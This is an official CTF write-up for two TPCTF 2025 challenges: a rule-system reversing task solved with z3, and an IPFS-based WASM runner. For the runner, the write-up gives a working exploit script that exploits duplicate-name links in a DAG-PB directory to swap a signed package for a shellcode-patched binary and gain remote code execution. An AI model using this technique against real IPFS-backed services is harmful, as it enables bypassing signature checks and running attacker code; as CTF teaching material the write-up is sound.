Published 2025-03-10 · Updated 2025-03-12 · CTF / Writeup · 24 min read (about 3565 words)

[Writeup] TPCTF 2025 Official Writeup

This article is also available in Simplified Chinese.

I created two challenges for TPCTF 2025: Misc - ipvm and Rev - superbooru. Personally, I would rate them as medium difficulty, with superbooru being a bit harder. The overall idea was to introduce some novel components to CTFs, enriching the experience and providing inspiration. Feel free to reach out if you have any thoughts or feedback.

Result: superbooru has one solve from 0ops, and ipvm has no solves.

`superbooru`

This challenge takes inspiration from booru image hosting services. A booru is a type of image hosting service that lets users upload images and tag them. The challenge implements a simple booru with static tag rules, which add or remove tags automatically. The rules have the form condition -> consequence, and their grammar in EBNF is as follows:

TAG = /\w+/
ATOM = TAG | GROUP | NEG
GROUP = "(" CONDITION ")"
NEG = "-" ATOM

OR_TERM = ATOM ("/" ATOM)+
AND_TERM = OR_TERM ("," OR_TERM)+

CONDITION = ATOM | OR_TERM | AND_TERM
CONSEQUENCE = (NEG? TAG) ("," (NEG? TAG))*

Here are some examples of valid rules:

dog, male -> male_with_dog, -pet_only: If the tags contain dog and male, then automatically add the tag male_with_dog and remove the tag pet_only.
(dog / cat), -male -> pet_only, animal_only: If the tags contain dog or cat and do not contain male, then automatically add the tags pet_only and animal_only.
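
To make the semantics concrete, here is a minimal sketch that hard-codes the two example rules as Python predicates. The `RULES` encoding and the helper name `apply_rules` are illustrative assumptions, not the challenge's own code, and applying additions before removals is also assumed.

```python
# Each rule: (condition over the current tag set, tags to add, tags to remove).
RULES = [
    # dog, male -> male_with_dog, -pet_only
    (lambda t: "dog" in t and "male" in t, {"male_with_dog"}, {"pet_only"}),
    # (dog / cat), -male -> pet_only, animal_only
    (lambda t: ("dog" in t or "cat" in t) and "male" not in t,
     {"pet_only", "animal_only"}, set()),
]


def apply_rules(tags):
    """Apply every matching rule once, evaluating conditions on the input set."""
    added, removed = set(), set()
    for cond, add, remove in RULES:
        if cond(tags):
            added |= add
            removed |= remove
    return (set(tags) | added) - removed


print(sorted(apply_rules({"dog", "male", "pet_only"})))
print(sorted(apply_rules({"cat"})))
```

The first call matches only the first rule, the second call only the second one.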

Well it looks good! Let’s check the handout:

BRUH

Note that here i is different from Ukrainian і.

If no consequence contained -, the challenge would be simple: we could use z3 to define each tag as the disjunction of the conditions that imply it and then solve the constraint flag_correct. The annoying part is the -. How are we even supposed to model a tag that is added and then removed?
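
As a toy illustration of the easy case, the sketch below treats each derived tag as the OR of the conditions that imply it. The tags `in0`, `in1` and `mid` are made up, and a brute-force search stands in for z3 so the example has no dependencies.

```python
from itertools import product

# Hypothetical rules with only positive consequences: tag -> list of conditions.
# Each condition is a function of the current valuation (a dict of booleans).
DEFS = {
    "mid": [lambda v: v["in0"] and not v["in1"]],
    "flag_correct": [
        lambda v: v["mid"] and v["in0"],
        lambda v: v["in1"] and v["mid"],
    ],
}


def evaluate(inputs):
    v = dict(inputs)
    # DEFS is listed in dependency order, so a single pass suffices here.
    for tag, conds in DEFS.items():
        v[tag] = any(c(v) for c in conds)
    return v


solutions = [
    bits
    for bits in product([False, True], repeat=2)
    if evaluate({"in0": bits[0], "in1": bits[1]})["flag_correct"]
]
print(solutions)
```

With 256 input bits brute force is hopeless, which is why a solver is needed for the real rule set.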

According to the code, the rules are applied round by round. In each round, the rules whose conditions hold are collected first, and their consequences are all applied at the end of the round. Running the flag check several times reveals something interesting: the number of rounds is almost fixed (around 2476 rounds). This hints that the rules follow a fixed schedule. Additionally, the author kindly mentioned in the code:

# It's guaranteed that the same implication applied
# multiple times will not change the result

This means that each rule effectively needs to be applied only once: applying it again does not change the result. In fact, if we record when these rules are applied, we will find that the timing is basically fixed. Then we can roughly guess that these rules are divided into many “layers”, and within each layer, the rules either do not apply or apply in the same round (as the other rules in this layer).
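
The round structure can be sketched as a two-phase loop. This is a simplified model rather than the handout's code: the rule tuples, the helper name `run_rounds`, and the choice to apply additions before removals within a round are all assumptions.

```python
def run_rounds(tags, rules, max_rounds=100):
    """Apply rules in rounds until nothing changes.

    Returns the final tag set and the number of rounds that changed it.
    """
    tags = set(tags)
    for rounds in range(max_rounds):
        add, remove = set(), set()
        # Phase 1: collect every rule whose condition holds on the current tags.
        for cond, plus, minus in rules:
            if cond(tags):
                add |= plus
                remove |= minus
        # Phase 2: apply all collected consequences at once.
        new_tags = (tags | add) - remove
        if new_tags == tags:
            return tags, rounds
        tags = new_tags
    raise RuntimeError("no fixed point reached")


rules = [
    (lambda t: "check_flag" in t, {"s1"}, {"check_flag"}),
    (lambda t: "s1" in t, {"s2"}, {"s1"}),
    (lambda t: "s2" in t and "x" in t, {"y"}, set()),
]
final, rounds = run_rounds({"check_flag", "x"}, rules)
print(sorted(final), rounds)
```

In the last round the third rule fires a second time without changing anything, which is exactly the property the comment in the handout guarantees.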

But how EXACTLY are these rules divided into layers? As the hint released in the second half of the competition says, starting from the initial check_flag tag, there will be a chain of tags like check_flag -> -check_flag, new_flag1, new_flag1 -> -new_flag1, new_flag2, and so on. For the nth layer of rules, we add the condition of new_flag{n} to achieve this layered structure.

Given this information, we can write a script to simplify the rules and remove the unnecessary tags used for obfuscation.

sol.py

from tqdm import tqdm

SPECIAL_CHARS = "(),/-"

name_map = {}


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        if self.tag in name_map:
            return name_map[self.tag]
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

imps = imps[6:]

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

used = set()
queue = ["flag_correct"]
head = 0
while head < len(queue):
    cur = queue[head]
    head += 1
    for i in who_implies.get(cur, []):
        imp = imps[i]
        for tag in imp.condition.tags():
            if tag not in used:
                used.add(tag)
                queue.append(tag)

all_tags = set()
for imp in imps:
    all_tags.update(imp.condition.tags())
    all_tags.update(Group("and", imp.consequence).tags())

unused = all_tags - used - {"hooray", "flag_correct"}
for imp in imps:
    imp.consequence = [
        tag
        for tag in imp.consequence
        if not (isinstance(tag, Tag) and tag.tag in unused)
        and not (isinstance(tag, Neg) and tag.query.tag in unused)
    ]

with open("mapping.txt", "w") as f:
    for name in used:
        if not name.startswith("flag") and name != "check_flag":
            name_map[name] = f"t{len(name_map)}"
            print(f"{name_map[name]} = {name}", file=f)

with open("implications_new.txt", "w") as f:
    for imp in imps:
        print(imp, file=f)
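
The pruning step in the script is a backward reachability search from flag_correct. A stripped-down sketch of the same idea on made-up rules (the `RULES` data and the name `relevant_tags` are hypothetical):

```python
from collections import deque

# Hypothetical rules: (tags read by the condition, tags written by the consequence).
RULES = [
    ({"a", "b"}, {"flag_correct"}),
    ({"c"}, {"a"}),
    ({"junk1"}, {"junk2"}),  # never feeds flag_correct
    ({"a"}, {"junk1"}),      # writes a tag that nothing relevant reads
]


def relevant_tags(rules, goal):
    """Collect every tag that can influence `goal`, walking rules backwards."""
    writers = {}
    for reads, writes in rules:
        for tag in writes:
            writers.setdefault(tag, []).append(reads)
    seen, queue = set(), deque([goal])
    while queue:
        cur = queue.popleft()
        for reads in writers.get(cur, []):
            for tag in reads - seen:
                seen.add(tag)
                queue.append(tag)
    return seen


print(sorted(relevant_tags(RULES, "flag_correct")))
```

Everything outside the returned set (here `junk1` and `junk2`) can be dropped from the consequences without affecting the goal.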

Then we extract the tag chain starting from check_flag (denoted as PC chain). After that, we can attach the layer information to the consequences. For example, for the following rules:

check_flag -> -check_flag, new_flag1
new_flag1, a -> c
new_flag1, -a -> -c

new_flag1 -> -new_flag1, new_flag2
new_flag2, b -> a
new_flag2, -b -> -a

new_flag2 -> -new_flag2, new_flag3
new_flag3, c -> b
new_flag3, -c -> -b

They’re actually equivalent to executing c = a, a = b, b = c in order. After attaching the layer information, we have:

a1 = a0, b1 = b0, c1 = a0
a2 = b1, b2 = b1, c2 = c1
a3 = a2, b3 = c2, c3 = c2
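
A quick way to convince yourself of this equivalence is to model each layer as one guarded copy and check all eight inputs. The `LAYERS` table and `run_layers` below are an illustrative simplification of the nine example rules, not code from the challenge.

```python
from itertools import product

# One (source, destination) pair per layer of the example.
# Layer n is guarded by new_flag{n}, so its copy runs only in that round.
LAYERS = [("a", "c"), ("b", "a"), ("c", "b")]


def run_layers(state):
    """Execute one guarded copy per round, in PC-chain order."""
    state = dict(state)
    for src, dst in LAYERS:
        # `new_flagN, src -> dst` plus `new_flagN, -src -> -dst` means dst = src.
        state[dst] = state[src]
    return state


for a, b, c in product([False, True], repeat=3):
    out = run_layers({"a": a, "b": b, "c": c})
    # After c = a, a = b, b = c the state is (b0, a0, a0).
    assert (out["a"], out["b"], out["c"]) == (b, a, a)
print("layers behave like c = a; a = b; b = c")
```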

So we can convert the problem into an SMT instance. To keep the model from becoming too complex, we only keep the tags that change in each round (e.g., a1, b1, b2, c2, a3, c3 in the example above are discarded). Finally, we can solve it directly with z3. On top of that, we can also use z3 to verify that the solution is unique.
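
Discarding unchanged versions means that a reference to a tag has to resolve to its most recent definition before the current round. A small sketch of that lookup for the three-layer example; the table `DEFINED_AT`, the helper `versioned_name` and the `_init` suffix are hypothetical naming choices.

```python
from bisect import bisect_left

# Rounds in which each tag is actually rewritten in the example:
# c in round 1, a in round 2, b in round 3.
DEFINED_AT = {"a": [2], "b": [3], "c": [1]}


def versioned_name(tag, cur_round):
    """Name of the latest definition of `tag` strictly before `cur_round`."""
    rounds = DEFINED_AT.get(tag, [])
    # bisect_left counts the definitions whose round is < cur_round.
    idx = bisect_left(rounds, cur_round)
    if idx == 0:
        return f"{tag}_init"  # never written so far: use the initial value
    return f"{rounds[idx - 1]}_{tag}"


# Round 3 computes b from c; c2 was discarded, so the reference resolves to c1.
print(versioned_name("c", 3))
# Round 2 computes a from b; b has not been written yet.
print(versioned_name("b", 2))
```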

sol2.py

from tqdm import tqdm
from z3 import Solver, Bool, BoolVal, And, Or, sat, is_true, unsat

SPECIAL_CHARS = "(),/-"

cur_pc = None


def format_z3(pc, tag):
    return Bool(f"{pc}_{tag}")


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag

    def to_z3(self):
        assert cur_pc is not None
        if self.tag in pc_order:
            return BoolVal(True)
        if self.tag.startswith("flag_bin_") or self.tag == "check_flag":
            return Bool(self.tag)

        for i in reversed(tag_pcs.get(self.tag, [])):
            if i < cur_pc:
                return format_z3(i, self.tag)

        return BoolVal(False)


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()

    def to_z3(self):
        return ~self.query.to_z3()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()

    def to_z3(self):
        queries = [query.to_z3() for query in self.queries]
        return And(queries) if self.type == "and" else Or(queries)


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications_new.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

pcs = ["check_flag"]
while True:
    pc = pcs[-1]
    if pc not in who_implies_neg:
        break
    assert len(who_implies_neg[pc]) == 1
    imp = imps[who_implies_neg[pc][0]]
    assert len(imp.consequence) == 2
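    # A PC rule has one negated tag (the old PC) and one plain tag (the next PC);
    # pick whichever of the two is not negated.
    other = (
        imp.consequence[0]
        if isinstance(imp.consequence[1], Neg)
        else imp.consequence[1]
    )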
    assert isinstance(other, Tag)
    pcs.append(other.tag)

print(len(pcs))

pc_order = {pc: i for i, pc in enumerate(pcs)}

important_imps = []
tag_pcs = {}
for imp in tqdm(imps):
    if isinstance(imp.condition, Tag) and imp.condition.tag in pcs:
        continue
    assert len(imp.consequence) == 1
    tag = imp.consequence[0]
    if isinstance(tag, Neg):
        continue

    tag = tag.tag
    if tag == "hooray":
        continue

    pc = None
    for t in imp.condition.tags():
        if t in pc_order:
            assert pc is None
            pc = t

    assert pc
    pc = pc_order[pc]
    imp.pc = pc
    important_imps.append(imp)
    tag_pcs.setdefault(tag, []).append(pc)

for pcs in tag_pcs.values():
    pcs.sort()

defs = {}

solver = Solver()
for imp in tqdm(important_imps):
    tag = imp.consequence[0].tag
    pc = imp.pc

    cur_pc = pc

    key = (pc, tag)
    val = defs.setdefault(key, BoolVal(False))
    defs[key] = val | imp.condition.to_z3()

for (pc, tag), val in defs.items():
    solver.add(format_z3(pc, tag) == val)

pcs = tag_pcs["flag_correct"]
assert len(pcs) == 1
solver.add(format_z3(pcs[0], "flag_correct"))

assert solver.check() == sat
model = solver.model()

ors = []

bits = []
flags = set()
for i in range(256):
    fl = f"flag_bin_{i:02x}"
    bits.append("01"[int(is_true(model[Bool(fl)]))])
    ors.append(Bool(fl) != is_true(model[Bool(fl)]))
    if is_true(model[Bool(fl)]):
        flags.add(fl)

solver.add(Or(*ors))
assert solver.check() == unsat

print(flags)

chs = []
for i in range(32):
    bs = bits[i * 8 : (i + 1) * 8]
    chs.append(chr(int("".join(reversed(bs)), 2)))

print("".join(chs))

The code looks verbose, but most of it is the same expression parser repeated. The whole solution takes about a minute to run, which is acceptable.
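
The final decoding step packs 8 bits per character with the least significant bit first. A standalone sketch of that conversion; `text_to_bits` is a hypothetical inverse helper added only to produce a test input.

```python
def bits_to_text(bits):
    """Decode a string of '0'/'1' characters, 8 per byte, LSB first."""
    assert len(bits) % 8 == 0
    chars = []
    for i in range(0, len(bits), 8):
        chunk = bits[i : i + 8]
        # Reverse the chunk so the first bit becomes the lowest one.
        chars.append(chr(int(chunk[::-1], 2)))
    return "".join(chars)


def text_to_bits(text):
    """Inverse of bits_to_text, used here only to build an input."""
    return "".join(format(ord(ch), "08b")[::-1] for ch in text)


print(bits_to_text(text_to_bits("TPCTF")))
```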

`ipvm`

This challenge is based on IPFS, a decentralized file storage protocol. IPFS essentially splits a piece of data into many blocks, each uniquely identified by its hash. The data as a whole is also identified by a hash (roughly, the hashes of all its sub-blocks concatenated and hashed again; see Merkle Tree), called the CID. These blocks are then distributed across a P2P network. Ideally, you only need the CID of a file to recursively download all its sub-blocks from the network. Sounds cool! But in reality, P2P is far from ideal; moreover, IPFS has various design flaws, see How IPFS is broken. Plenty of people still use IPFS, so it’s up to you to decide.
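
The content-addressing idea can be sketched in a few lines. This is a toy model only: real CIDs are multihash-encoded and real blocks are DAG-PB/UnixFS nodes, while here a plain SHA-256 hex digest and a newline-separated list of child ids are assumed, and `store`, `fetch` and `CHUNK` are made-up names.

```python
import hashlib

CHUNK = 4  # tiny chunk size for illustration; real IPFS chunks are far larger


def block_id(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def store(data: bytes, blocks: dict) -> str:
    """Split data into chunks, store each under its hash, return a root id."""
    child_ids = []
    for i in range(0, len(data), CHUNK):
        chunk = data[i : i + CHUNK]
        cid = block_id(chunk)
        blocks[cid] = chunk
        child_ids.append(cid)
    root = "\n".join(child_ids).encode()
    root_id = block_id(root)
    blocks[root_id] = root
    return root_id


def fetch(root_id: str, blocks: dict) -> bytes:
    """Rebuild the data from the root id alone, verifying every block."""
    root = blocks[root_id]
    assert block_id(root) == root_id
    out = b""
    for cid in root.decode().split():
        assert block_id(blocks[cid]) == cid
        out += blocks[cid]
    return out


blocks = {}
rid = store(b"hello ipfs", blocks)
print(fetch(rid, blocks))
```

Because every id is derived from content, whoever holds the root id can verify each block no matter which peer served it.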

Back to this challenge. This challenge provides a WASM runtime platform based on IPFS. You can:

build: Upload a folder containing wat / wasm files (yes, IPFS supports folders), and the server will optimize and compile it, sign it, and return the compiled package CID.
run: Upload a package CID, and the server will verify the signature and run it.

That’s it, really simple. Where can the vulnerability even be?

We know that the running process of wasm generally involves AOT compilation followed by local execution. Here build and run basically reproduce this process, which could lead to RCE because the output of build is essentially native code. If we can control the input to run, we can do whatever we want. However, the signature verification is quite annoying. If the output is not generated by a normal build, it won’t pass the signature verification. Wasmtime, the runtime environment, is known for its security, making it difficult to exploit a 0day RCE from wasm. What should we do then?

If you are careful enough, you can spot an inconsistency in how the server reads files from the folder. The first method is ipfs_read, which directly calls ipfs cat <path> to print the file content. Here, path can be either the CID itself (of course, this requires that the CID corresponds to a file rather than a folder) or a sub-file path of the CID (e.g., CID/config.json). The second method is to create a temporary folder and use ipfs get <CID> to download all files from the CID into this temporary folder.

This inconsistency turns out to be the key to the vulnerability. After some digging, we know that IPFS uses DAG-PB to store directories. The protobuf definition is as follows:

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}

An idea emerges: what if we have multiple PBLink with the same name in a PBNode (corresponding to multiple files with the same name in a folder)? It turns out that ipfs cat will return the content of the first file, while ipfs get will write all files sequentially, resulting in the last file’s content being the final output. This inconsistency allows us to maliciously append a main.cwasm to the package generated by build. During signature verification, ipfs cat will work fine, but when we download and execute it using ipfs get, it will execute our malicious main.cwasm. This is how we achieve RCE.
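
The mismatch boils down to first-match lookup versus last-write-wins. A minimal model of the two code paths, where the directory is just an ordered list of links; `cat` and `get` are stand-ins written for this sketch, not the real IPFS implementations.

```python
# A directory as an ordered list of (name, content) links; duplicates allowed.
LINKS = [
    ("config.json", b"{}"),
    ("main.cwasm", b"signed build output"),
    ("main.cwasm", b"attacker payload"),
]


def cat(links, name):
    """First-match lookup, modelling the `ipfs cat CID/name` behaviour."""
    for link_name, content in links:
        if link_name == name:
            return content
    raise FileNotFoundError(name)


def get(links):
    """Write every link in order, modelling `ipfs get`; later writes win."""
    files = {}
    for link_name, content in links:
        files[link_name] = content
    return files


print(cat(LINKS, "main.cwasm"))         # what the signature check sees
print(get(LINKS)["main.cwasm"])         # what ends up on disk and gets run
```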

As for constructing the malicious main.cwasm payload, I patched a compiled main.cwasm using IDA, injecting a segment of shellcode into the function execution part.

P.S. Use protoc dag.proto --python_out . to compile protobuf
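
If protoc is not at hand, the two messages are small enough to serialize manually. Below is a rough sketch of the protobuf wire format for them; the helper names are made up, the node's Data field is deliberately left out, and the exploit itself uses the generated dag_pb2 module instead.

```python
def varint(n: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def len_delimited(field: int, payload: bytes) -> bytes:
    """Wire type 2: tag, length, then the raw payload."""
    return varint(field << 3 | 2) + varint(len(payload)) + payload


def pb_link(hash_: bytes, name: str, tsize: int) -> bytes:
    return (
        len_delimited(1, hash_)            # Hash = 1
        + len_delimited(2, name.encode())  # Name = 2
        + varint(3 << 3 | 0)               # Tsize = 3, wire type 0 (varint)
        + varint(tsize)
    )


def pb_node(links: list[bytes]) -> bytes:
    """A PBNode holding only Links (field 2); Data is omitted in this sketch."""
    return b"".join(len_delimited(2, link) for link in links)


link = pb_link(b"\x01\x02", "a", 5)
print(link.hex())
print(pb_node([link, link]).hex())
```

Nothing in the encoding prevents two links from carrying the same Name, which is what the exploit relies on.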

exp.cwasm

dag.proto

syntax = "proto3";

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}

build/config.json

{
  "name": "test",
  "entrypoint": "add"
}

build/main.wat

(module
    (func $add (export "add") (param $a i32) (param $b i32) (result i32)
        (i32.add (local.get $a) (local.get $b))
    )
)

exp.py

from dag_pb2 import *
from base58 import b58decode
import subprocess as sp
import requests as rq


ip, port = '127.0.0.1 8000'.split()
base = f"http://{ip}:{port}"
ipfs = ["ipfs", "--api", f"/ip4/{ip}/tcp/{port}"]


def add(path):
    output = sp.check_output(ipfs + ["add", "-r", path]).decode().strip()
    line = output.splitlines()[-1]
    return line.split()[1]


built = rq.post(f"{base}/build", json={"cid": add("build")}).json()
output = sp.check_output(ipfs + ["block", "get", built["cid"]])

node = PBNode()
node.ParseFromString(output)

exp = add("exp.cwasm")
node.Links.insert(2, PBLink(Hash=b58decode(exp), Name="main.cwasm", Tsize=13483))

p = sp.Popen(ipfs + ["block", "put", "--format=v0"], stdin=sp.PIPE, stdout=sp.PIPE)
p.stdin.write(node.SerializeToString())
p.stdin.close()
modified = p.stdout.read().decode().strip()

output = rq.post(f"{base}/run", json={"cid": modified, "args": "1"}).json()
print(output)

https://mivik.moe/2025/solution/tpctf-2025-en/

Author: Mivik
